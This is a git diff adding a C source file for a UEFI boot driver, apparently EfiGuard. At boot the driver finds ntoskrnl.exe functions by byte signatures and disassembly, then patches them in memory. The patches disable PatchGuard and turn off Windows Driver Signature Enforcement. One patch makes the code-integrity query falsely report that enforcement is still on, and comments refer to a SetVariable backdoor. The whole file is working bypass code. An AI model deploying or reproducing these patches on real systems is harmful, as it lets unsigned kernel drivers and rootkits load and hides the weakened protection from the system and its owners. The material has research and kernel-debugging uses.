diff options
Diffstat (limited to 'EfiGuardDxe/PatchNtoskrnl.c')
-rw-r--r-- | EfiGuardDxe/PatchNtoskrnl.c | 661 |
1 files changed, 661 insertions, 0 deletions
diff --git a/EfiGuardDxe/PatchNtoskrnl.c b/EfiGuardDxe/PatchNtoskrnl.c new file mode 100644 index 0000000..b5d34f6 --- /dev/null +++ b/EfiGuardDxe/PatchNtoskrnl.c @@ -0,0 +1,661 @@ +#include "EfiGuardDxe.h" + +#include <Library/BaseMemoryLib.h> + + +// Global kernel patch status information. +// +// The justification for statically allocating these ~8KB is that this buffer will be accessible during both contexts of winload.efi. Winload has two +// runtime contexts: the real mode firmware context (= 1), in which EFI services are accessible, and the protected mode application context (= 0), +// which has its own GDT, IDT and paging levels and which is used to set up the NT environment and enable virtual addressing. Winload switches between +// the two with BlpArchSwitchContext() when needed. Because we cannot allocate memory in protected mode (e.g. in PatchNtoskrnl), and any memory +// allocated in real mode (e.g. in PatchWinload) will need address translation on later access, this is by far the simplest solution +// because it allows the buffer to be accessed from both contexts at all stages of driver execution. +KERNEL_PATCH_INFORMATION gKernelPatchInfo; + + +// Signature for ntoskrnl!KeInitAmd64SpecificState +// This function is present in all x64 kernels since Vista. It generates a #DE due to 32 bit idiv quotient overflow. +STATIC CONST UINT8 SigKeInitAmd64SpecificState[] = { + 0xF7, 0xD9, // neg ecx + 0x45, 0x1B, 0xC0, // sbb r8d, r8d + 0x41, 0x83, 0xE0, 0xEE, // and r8d, 0FFFFFFEEh + 0x41, 0x83, 0xC0, 0x11, // add r8d, 11h + 0xD1, 0xCA, // ror edx, 1 + 0x8B, 0xC2, // mov eax, edx + 0x99, // cdq + 0x41, 0xF7, 0xF8 // idiv r8d +}; + +// Signature for SeCodeIntegrityQueryInformation, called through NtQuerySystemInformation(SystemCodeIntegrityInformation). +// This function has actually existed since Vista in various forms, sometimes (8/8.1/early 10) inlined in ExpQuerySystemInformation. +// This signature is only for the Windows 10 RS3+ version. I could add more signatures but this is a pretty superficial patch anyway. +STATIC CONST UINT8 SigSeCodeIntegrityQueryInformation[] = { + 0x48, 0x83, 0xEC, // sub rsp, XX + 0xCC, 0x48, 0x83, 0x3D, 0xCC, 0xCC, 0xCC, 0xCC, 0x00, // cmp cs:qword_14035E638, 0 + 0x4D, 0x8B, 0xC8, // mov r9, r8 + 0x4C, 0x8B, 0xD1, // mov r10, rcx + 0x74, 0xCC, // jz XX + 0x8A, 0x05, 0xCC, 0xCC, 0xCC, 0xCC, // mov al, cs:SeILSigningPolicy + 0x0F, 0xB6, 0xC8, // movzx ecx, al + 0x84, 0xC0, // test al, al + 0x75, 0xCC, // jnz XX + 0x0F, 0xB6, 0x0D, 0xCC, 0xCC, 0xCC, 0xCC // movzx ecx, cs:SeILSigningPolicyRuntime +}; + +// Patched SeCodeIntegrityQueryInformation which reports that DSE is enabled +STATIC CONST UINT8 SeCodeIntegrityQueryInformationPatch[] = { + 0x41, 0xC7, 0x00, 0x08, 0x00, 0x00, 0x00, // mov dword ptr [r8], 8 + 0x33, 0xC0, // xor eax, eax + 0xC7, 0x41, 0x04, 0x01, 0x00, 0x00, 0x00, // mov dword ptr [rcx+4], 1 + 0xC3 // ret +}; + + +// +// Defuses PatchGuard initialization routines before execution is transferred to the kernel. +// All code accessed here is located in the INIT section. +// +STATIC +EFI_STATUS +EFIAPI +DisablePatchGuard( + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN PEFI_IMAGE_SECTION_HEADER InitSection, + IN UINT16 BuildNumber + ) +{ + CONST UINT32 StartRva = InitSection->VirtualAddress; + CONST UINT32 SizeOfRawData = InitSection->SizeOfRawData; + CONST UINT8* StartVa = ImageBase + StartRva; + + // Search for KeInitAmd64SpecificState + PRINT_KERNEL_PATCH_MSG(L"\r\n== Searching for nt!KeInitAmd64SpecificState pattern in INIT ==\r\n"); + UINT8* KeInitAmd64SpecificStatePatternAddress = NULL; + for (UINT8* Address = (UINT8*)StartVa; Address < StartVa + SizeOfRawData - sizeof(SigKeInitAmd64SpecificState); ++Address) + { + if (CompareMem(Address, SigKeInitAmd64SpecificState, sizeof(SigKeInitAmd64SpecificState)) == 0) + { + KeInitAmd64SpecificStatePatternAddress = Address; + PRINT_KERNEL_PATCH_MSG(L" Found KeInitAmd64SpecificState pattern at 0x%llX.\r\n", (UINTN)KeInitAmd64SpecificStatePatternAddress); + break; + } + } + + // Backtrack to function start + UINT8* KeInitAmd64SpecificState = BacktrackToFunctionStart(KeInitAmd64SpecificStatePatternAddress, + (UINT8*)(KeInitAmd64SpecificStatePatternAddress - StartVa)); + if (KeInitAmd64SpecificState == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find KeInitAmd64SpecificState%S.\r\n", + (KeInitAmd64SpecificStatePatternAddress == NULL ? L" pattern" : L"")); + return EFI_NOT_FOUND; + } + + // Search for CcInitializeBcbProfiler (Win 8+) / <HUGEFUNC> (Win Vista/7) + // Most variables below use the 'CcInitializeBcbProfiler' name, which is not really accurate for Windows Vista/7 but close enough. + // For debug prints, call the function "<HUGEFUNC>" instead if we're on Windows Vista/7. (seriously, it's fucking huge) + CONST CHAR16* FuncName = BuildNumber >= 9200 ? L"CcInitializeBcbProfiler" : L"<HUGEFUNC>"; + PRINT_KERNEL_PATCH_MSG(L"== Disassembling INIT to find nt!%S ==\r\n", FuncName); + UINT8* CcInitializeBcbProfilerPatternAddress = NULL; + + // On Windows Vista/7 we need to find the address of RtlPcToFileHeader, which will help identify HUGEFUNC as no other function calls this + UINTN RtlPcToFileHeader = 0; + if (BuildNumber < 9200) + { + RtlPcToFileHeader = (UINTN)GetProcedureAddress((UINTN)ImageBase, NtHeaders, "RtlPcToFileHeader"); + if (RtlPcToFileHeader == 0) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to find RtlPcToFileHeader export.\r\n"); + return EFI_NOT_FOUND; + } + } + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + CONST UINTN Length = SizeOfRawData; + UINTN Offset = 0; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(StartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + if (BuildNumber < 9200) + { + // Windows Vista/7: check if this is 'call IMM' + if (Instruction.operand_count == 4 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE && + Instruction.mnemonic == ZYDIS_MNEMONIC_CALL) + { + // Check if this is 'call RtlPcToFileHeader' + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == RtlPcToFileHeader) + { + CcInitializeBcbProfilerPatternAddress = (UINT8*)InstructionAddress; + PRINT_KERNEL_PATCH_MSG(L" Found 'call RtlPcToFileHeader' at 0x%llX.\r\n", (UINTN)CcInitializeBcbProfilerPatternAddress); + break; + } + } + } + else + { + // Windows 8+: check if this is 'mov [al|rax], 0x0FFFFF780000002D4' ; SharedUserData->KdDebuggerEnabled + if ((Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER) && + ((Instruction.operands[0].reg.value == ZYDIS_REGISTER_AL && Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && + (UINT64)(Instruction.operands[1].mem.disp.value) == 0x0FFFFF780000002D4ULL) || + (Instruction.operands[0].reg.value == ZYDIS_REGISTER_RAX && Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && + Instruction.operands[1].imm.value.u == 0x0FFFFF780000002D4ULL))) + { + CcInitializeBcbProfilerPatternAddress = (UINT8*)InstructionAddress; + PRINT_KERNEL_PATCH_MSG(L" Found CcInitializeBcbProfiler pattern at 0x%llX.\r\n", (UINTN)CcInitializeBcbProfilerPatternAddress); + break; + } + } + + Offset += Instruction.length; + } + + // Backtrack to function start + UINT8* CcInitializeBcbProfiler = BacktrackToFunctionStart(CcInitializeBcbProfilerPatternAddress, + (UINT8*)(CcInitializeBcbProfilerPatternAddress - StartVa)); + if (CcInitializeBcbProfiler == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find %S%S.\r\n", + FuncName, (CcInitializeBcbProfilerPatternAddress == NULL ? L" pattern" : L"")); + return EFI_NOT_FOUND; + } + + // Search for ExpLicenseWatchInitWorker (only exists on Windows >= 8) + UINT8* ExpLicenseWatchInitWorker = NULL; + if (BuildNumber >= 9200) + { + PRINT_KERNEL_PATCH_MSG(L"== Disassembling INIT to find nt!ExpLicenseWatchInitWorker ==\r\n"); + UINT8* ExpLicenseWatchInitWorkerPatternAddress = NULL; + + // Start decode loop + Offset = 0; + while ((InstructionAddress = (ZyanU64)(StartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is 'mov al, ds:[0x0FFFFF780000002D4]' ; SharedUserData->KdDebuggerEnabled + // The address must also obviously not be the CcInitializeBcbProfiler one we just found + if ((UINT8*)InstructionAddress != CcInitializeBcbProfilerPatternAddress && + Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_AL && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[1].mem.segment == ZYDIS_REGISTER_DS && + Instruction.operands[1].mem.disp.value == 0x0FFFFF780000002D4LL) + { + ExpLicenseWatchInitWorkerPatternAddress = (UINT8*)InstructionAddress; + PRINT_KERNEL_PATCH_MSG(L" Found ExpLicenseWatchInitWorker pattern at 0x%llX.\r\n", (UINTN)ExpLicenseWatchInitWorkerPatternAddress); + break; + } + + Offset += Instruction.length; + } + + // Backtrack to function start + ExpLicenseWatchInitWorker = BacktrackToFunctionStart(ExpLicenseWatchInitWorkerPatternAddress, + (UINT8*)(ExpLicenseWatchInitWorkerPatternAddress - StartVa)); + if (ExpLicenseWatchInitWorker == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find ExpLicenseWatchInitWorker%S.\r\n", + (ExpLicenseWatchInitWorkerPatternAddress == NULL ? L" pattern" : L"")); + return EFI_NOT_FOUND; + } + } + + // We have all the addresses we need; now do the actual patching. + CONST UINT32 Yes = 0xC301B0; // mov al, 1, ret + CONST UINT32 No = 0xC3C033; // xor eax, eax, ret + *((UINT32*)KeInitAmd64SpecificState) = No; + *((UINT32*)CcInitializeBcbProfiler) = Yes; + if (ExpLicenseWatchInitWorker != NULL) + *((UINT32*)ExpLicenseWatchInitWorker) = No; + + // Print info + PRINT_KERNEL_PATCH_MSG(L"\r\n Patched KeInitAmd64SpecificState [RVA: 0x%X].\r\n", + (UINT32)(KeInitAmd64SpecificState - ImageBase)); + PRINT_KERNEL_PATCH_MSG(L" Patched %S [RVA: 0x%X].\r\n", + FuncName, (UINT32)(CcInitializeBcbProfiler - ImageBase)); + if (ExpLicenseWatchInitWorker != NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Patched ExpLicenseWatchInitWorker [RVA: 0x%X].\r\n", + (UINT32)(ExpLicenseWatchInitWorker - ImageBase)); + } + + return EFI_SUCCESS; +} + +// +// Disables DSE for the duration of the boot by preventing it from initializing. +// This function is only called if DseBypassMethod is DSE_DISABLE_AT_BOOT, or if the Windows version is Vista or 7 +// and DseBypassMethod is DSE_DISABLE_SETVARIABLE_HOOK. In the latter case, only one byte is patched to make +// the SetVariable backdoor safe to use more than once. DSE will still be fully initialized in this case. +// All code accessed here is located in the PAGE section. +// +STATIC +EFI_STATUS +DisableDSE( + IN UINT8* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders, + IN PEFI_IMAGE_SECTION_HEADER PageSection, + IN EFIGUARD_DSE_BYPASS_TYPE BypassType, + IN UINT16 BuildNumber + ) +{ + if (BypassType == DSE_DISABLE_NONE) + return EFI_INVALID_PARAMETER; + + CONST UINT32 PageSizeOfRawData = PageSection->SizeOfRawData; + CONST UINT8* PageStartVa = ImageBase + PageSection->VirtualAddress; + + // Find the ntoskrnl.exe IAT address for CI.dll!CiInitialize + VOID* CiInitialize; + CONST EFI_STATUS IatStatus = FindIATAddressForImport(ImageBase, + NtHeaders, + "CI.dll", + "CiInitialize", + &CiInitialize); + if (EFI_ERROR(IatStatus)) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to find IAT address of CI.dll!CiInitialize.\r\n"); + return IatStatus; + } + + PRINT_KERNEL_PATCH_MSG(L"\r\n== Disassembling PAGE to find nt!SepInitializeCodeIntegrity 'mov ecx, xxx' ==\r\n"); + + // Initialize Zydis + ZydisDecoder Decoder; + ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL); + if (!ZYAN_SUCCESS(Status)) + { + PRINT_KERNEL_PATCH_MSG(L"Failed to initialize disassembler engine.\r\n"); + return EFI_LOAD_ERROR; + } + + UINT8* SepInitializeCodeIntegrityMovEcxAddress = NULL; + UINTN Length, Offset; + ZyanU64 InstructionAddress; + ZydisDecodedInstruction Instruction; + + if (BuildNumber < 9200) + { + // On Windows Vista/7 we have an enormously annoying import thunk in .text to find. All it does is 'jmp __imp_CiInitialize'. + // SepInitializeCodeIntegrity will then call this thunk. What a waste + CONST PEFI_IMAGE_SECTION_HEADER TextSection = IMAGE_FIRST_SECTION(NtHeaders); + VOID* JmpCiInitializeAddress = NULL; + Length = TextSection->SizeOfRawData; + Offset = 0; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(ImageBase + TextSection->VirtualAddress + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + if ((Instruction.operand_count == 2 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) && + Instruction.mnemonic == ZYDIS_MNEMONIC_JMP) + { + // Check if this is 'jmp qword ptr ds:[CiInitialize IAT RVA]' + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)CiInitialize) + { + JmpCiInitializeAddress = (VOID*)InstructionAddress; + break; + } + } + + Offset += Instruction.length; + } + + if (JmpCiInitializeAddress == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find 'jmp __imp_CiInitialize' import thunk.\r\n"); + return EFI_NOT_FOUND; + } + + // Make this the new 'IAT address' to simplify checks below + CiInitialize = JmpCiInitializeAddress; + } + + UINT8* LastMovIntoEcx = NULL; // Keep track of 'mov ecx, xxx' - the last one before call/jmp cs:__imp_CiInitialize is the one we want to patch + Length = PageSizeOfRawData; + Offset = 0; + + // Start decode loop + while ((InstructionAddress = (ZyanU64)(PageStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is a 2-byte (size of our patch) 'mov ecx, <anything>' and store the instruction address if so + if (Instruction.operand_count == 2 && Instruction.length == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_ECX) + { + LastMovIntoEcx = (UINT8*)InstructionAddress; + } + else if ((BuildNumber >= 9200 && + ((Instruction.operand_count == 2 || Instruction.operand_count == 4) && + (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) && + ((Instruction.mnemonic == ZYDIS_MNEMONIC_JMP && Instruction.operand_count == 2) || + (Instruction.mnemonic == ZYDIS_MNEMONIC_CALL && Instruction.operand_count == 4)))) + || + (BuildNumber < 9200 && + (Instruction.operand_count == 4 && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE && + Instruction.mnemonic == ZYDIS_MNEMONIC_CALL))) + { + // Check if this is + // 'call IMM:CiInitialize thunk' // E8 ?? ?? ?? ?? // Windows Vista/7 + // or + // 'jmp qword ptr ds:[CiInitialize IAT RVA]' // 48 FF 25 ?? ?? ?? ?? // Windows 8 through 10.0.15063.0 + // or + // 'call qword ptr ds:[CiInitialize IAT RVA]' // FF 15 ?? ?? ?? ?? // Windows 10.0.16299.0+ + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == (UINTN)CiInitialize) + { + SepInitializeCodeIntegrityMovEcxAddress = LastMovIntoEcx; // The last 'mov ecx, xxx' before the call/jmp is the instruction we want + PRINT_KERNEL_PATCH_MSG(L" Found 'mov ecx, xxx' in SepInitializeCodeIntegrity [RVA: 0x%X].\r\n", + (UINT32)(SepInitializeCodeIntegrityMovEcxAddress - ImageBase)); + break; + } + } + + Offset += Instruction.length; + } + + if (SepInitializeCodeIntegrityMovEcxAddress == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find SepInitializeCodeIntegrity 'mov ecx, xxx' pattern.\r\n"); + return EFI_NOT_FOUND; + } + + UINTN gCiEnabled = 0; + if (BuildNumber < 9200) + { + // On Windows Vista/7, find g_CiEnabled now because it's a few bytes away and we'll it need later + Length = 32; + Offset = 0; + + while ((InstructionAddress = (ZyanU64)(SepInitializeCodeIntegrityMovEcxAddress + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // Check if this is 'mov g_CiEnabled, REG8' + if (Instruction.operand_count == 2 && + Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && + Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_REGISTER) + { + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, (ZyanU64*)&gCiEnabled))) + { + PRINT_KERNEL_PATCH_MSG(L" Found g_CiEnabled at 0x%llX.\r\n", gCiEnabled); + break; + } + } + + Offset += Instruction.length; + } + + if (gCiEnabled == 0) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find g_CiEnabled.\r\n"); + return EFI_NOT_FOUND; + } + } + + PRINT_KERNEL_PATCH_MSG(L"== Disassembling PAGE to find nt!SeValidateImageData '%S' ==\r\n", + (BuildNumber >= 9200 ? L"mov eax, 0xC0000428" : L"cmp g_CiEnabled, al")); + UINT8 *SeValidateImageDataMovEaxAddress = NULL, *SeValidateImageDataJzAddress = NULL; + + // Start decode loop + Length = PageSizeOfRawData; + Offset = 0; + while ((InstructionAddress = (ZyanU64)(PageStartVa + Offset), + Status = ZydisDecoderDecodeBuffer(&Decoder, + (VOID*)InstructionAddress, + Length - Offset, + &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA) + { + if (!ZYAN_SUCCESS(Status)) + { + Offset++; + continue; + } + + // On Windows >= 8, check if this is 'mov eax, 0xC0000428' (STATUS_INVALID_IMAGE_HASH) in SeValidateImageData + if ((BuildNumber >= 9200 && + (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV) && + (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_EAX) && + Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[1].imm.value.s == 0xc0000428LL)) + { + // Exclude false positives: next instruction must be jmp rel32 (Win 8), jmp rel8 (Win 8.1/10) or ret + CONST UINT8* Address = (UINT8*)InstructionAddress; + CONST UINT8 JmpOpcode = BuildNumber >= 9600 ? 0xEB : 0xE9; + if (*(Address + Instruction.length) == JmpOpcode || *(Address + Instruction.length) == 0xC3) + { + SeValidateImageDataMovEaxAddress = (UINT8*)Address; + PRINT_KERNEL_PATCH_MSG(L" Found 'mov eax, 0xC0000428' in SeValidateImageData [RVA: 0x%X].\r\n", + (UINT32)(SeValidateImageDataMovEaxAddress - ImageBase)); + break; + } + } + // On Windows Vista/7, check if this is 'cmp g_CiEnabled, al' in SeValidateImageData + else if (BuildNumber < 9200 && + (Instruction.operand_count == 3 && Instruction.mnemonic == ZYDIS_MNEMONIC_CMP) && + (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) && + (Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[1].reg.value == ZYDIS_REGISTER_AL)) + { + ZyanU64 OperandAddress = 0; + if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) && + OperandAddress == gCiEnabled) + { + // Verify the next instruction is jz, and store its address instead of the cmp, as we will be patching the jz + CONST UINT8* Address = (UINT8*)InstructionAddress; + if (*(Address + Instruction.length) == 0x74) + { + SeValidateImageDataJzAddress = (UINT8*)(Address + Instruction.length); + PRINT_KERNEL_PATCH_MSG(L" Found 'cmp g_CiEnabled, al' in SeValidateImageData [RVA: 0x%X].\r\n", + (UINT32)(Address - ImageBase)); + break; + } + } + } + + Offset += Instruction.length; + } + + if (SeValidateImageDataMovEaxAddress == NULL && SeValidateImageDataJzAddress == NULL) + { + PRINT_KERNEL_PATCH_MSG(L" Failed to find SeValidateImageData '%S' pattern.\r\n", + (BuildNumber >= 9200 ? L"mov eax, 0xC0000428" : L"cmp g_CiEnabled, al")); + return EFI_NOT_FOUND; + } + + // We have all the addresses we need; now do the actual patching. + // SepInitializeCodeIntegrity is only patched when using the 'nuke option' DSE_DISABLE_AT_BOOT. + if (BypassType == DSE_DISABLE_AT_BOOT) + *((UINT16*)SepInitializeCodeIntegrityMovEcxAddress) = 0xC931; // xor ecx, ecx + + // SeValidateImageData *must* be patched on Windows Vista and 7 regardless of the DSE bypass method. + // On Windows >= 8, again require DSE_DISABLE_AT_BOOT to do anything as it is otherwise harmless. + if (BuildNumber < 9200) + *SeValidateImageDataJzAddress = 0xEB; // jmp + else if (BypassType == DSE_DISABLE_AT_BOOT) + *(UINT32*)((UINT8*)SeValidateImageDataMovEaxAddress + 1 /*skip existing mov opcode*/) = 0x0; // mov eax, 0 + + if (BuildNumber >= 16299 && BypassType == DSE_DISABLE_AT_BOOT) + { + // We are on RS3 or higher. If we can find and patch SeCodeIntegrityQueryInformation, great. + // But DSE has been disabled at this point, so success will be returned regardless. + UINT8* Found = NULL; + CONST EFI_STATUS CiStatus = FindPattern(SigSeCodeIntegrityQueryInformation, + 0xCC, + sizeof(SigSeCodeIntegrityQueryInformation), + (VOID*)PageStartVa, // SeCodeIntegrityQueryInformation is in PAGE, so start there + PageSizeOfRawData, + (VOID**)&Found); + if (EFI_ERROR(CiStatus)) + { + PRINT_KERNEL_PATCH_MSG(L"\r\nFailed to find SeCodeIntegrityQueryInformation. Skipping patch.\r\n"); + } + else + { + CopyMem((VOID*)Found, (VOID*)SeCodeIntegrityQueryInformationPatch, sizeof(SeCodeIntegrityQueryInformationPatch)); + PRINT_KERNEL_PATCH_MSG(L"\r\nPatched SeCodeIntegrityQueryInformation [RVA: 0x%X].\r\n", (UINT32)(Found - ImageBase)); + } + } + + return EFI_SUCCESS; +} + +// +// Patches ntoskrnl.exe +// +EFI_STATUS +EFIAPI +PatchNtoskrnl( + IN VOID* ImageBase, + IN PEFI_IMAGE_NT_HEADERS NtHeaders + ) +{ + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ntoskrnl.exe at 0x%llX, size 0x%llX\r\n", (UINTN)ImageBase, (UINTN)NtHeaders->OptionalHeader.SizeOfImage); + + // Print file and version info + UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0; + UINT32 FileFlags = 0; + EFI_STATUS Status = GetPeFileVersionInfo((VOID*)ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, &FileFlags); + if (EFI_ERROR(Status)) + { + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] WARNING: failed to obtain ntoskrnl.exe version info. Status: %llx\r\n", Status); + } + else + { + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] Patching ntoskrnl.exe v%u.%u.%u.%u...\r\n", MajorVersion, MinorVersion, BuildNumber, Revision); + + // Check if this is a supported kernel version. All versions after Vista SP1 should be supported. + // There is no "maximum allowed" version; e.g. 10.1, 11.0... are OK. Windows 10 is a whole three major versions higher than Windows 7, + // and the only real changes were an added spyware bundle and the removal of the classic theme. Seriously, fuck whoever did that + if (BuildNumber < 6001) + { + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ERROR: Unsupported kernel image version.\r\n"); + return EFI_UNSUPPORTED; + } + + if ((FileFlags & VS_FF_DEBUG) != 0) + { + // Do not patch checked kernels. There is too much difference in PG and DSE initialization code due to missing optimizations. + // This is a moot point anyway because MS has stopped releasing checked OS builds or even kernels to common plebs (i.e. not Intel or Nvidia) + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] ERROR: Checked kernels are not supported.\r\n"); + return EFI_UNSUPPORTED; + } + } + + // Find the INIT and PAGE sections + PEFI_IMAGE_SECTION_HEADER InitSection = NULL, PageSection = NULL; + PEFI_IMAGE_SECTION_HEADER Section = IMAGE_FIRST_SECTION(NtHeaders); + for (UINT16 i = 0; i < NtHeaders->FileHeader.NumberOfSections; ++i) + { + CHAR8 SectionName[EFI_IMAGE_SIZEOF_SHORT_NAME + 1]; + CopyMem(SectionName, Section->Name, EFI_IMAGE_SIZEOF_SHORT_NAME); + SectionName[MAX(sizeof("PAGE"), sizeof("INIT"))] = '\0'; // Null terminate so we don't match lookalikes like INITDATA and PAGEVRFY + + if (AsciiStrCmp(SectionName, "INIT") == 0) + InitSection = Section; + else if (AsciiStrCmp(SectionName, "PAGE") == 0) + PageSection = Section; + + Section++; + } + + ASSERT(InitSection != NULL); + ASSERT(PageSection != NULL); + + // Patch INIT section to disable PatchGuard + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] Disabling PatchGuard... [INIT RVA: 0x%X - 0x%X]\r\n", + InitSection->VirtualAddress, InitSection->VirtualAddress + InitSection->SizeOfRawData); + Status = DisablePatchGuard((UINT8*)ImageBase, + NtHeaders, + InitSection, + BuildNumber); + if (EFI_ERROR(Status)) + goto Exit; + + PRINT_KERNEL_PATCH_MSG(L"\r\n[PatchNtoskrnl] Successfully disabled PatchGuard.\r\n"); + + if (gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT || + (BuildNumber < 9200 && gDriverConfig.DseBypassMethod != DSE_DISABLE_NONE)) + { + // Patch PAGE section to disable DSE at boot, or (on Windows Vista/7) to allow the SetVariable hook to be safely used more than once + PRINT_KERNEL_PATCH_MSG(L"[PatchNtoskrnl] %S... [PAGE RVA: 0x%X - 0x%X]\r\n", + gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT ? L"Disabling DSE" : L"Ensuring safe DSE bypass", + PageSection->VirtualAddress, PageSection->VirtualAddress + PageSection->SizeOfRawData); + Status = DisableDSE((UINT8*)ImageBase, + NtHeaders, + PageSection, + gDriverConfig.DseBypassMethod, + BuildNumber); + if (EFI_ERROR(Status)) + goto Exit; + + if (gDriverConfig.DseBypassMethod == DSE_DISABLE_AT_BOOT) + PRINT_KERNEL_PATCH_MSG(L"\r\n[PatchNtoskrnl] Successfully disabled DSE.\r\n"); + } + +Exit: + return Status; +} |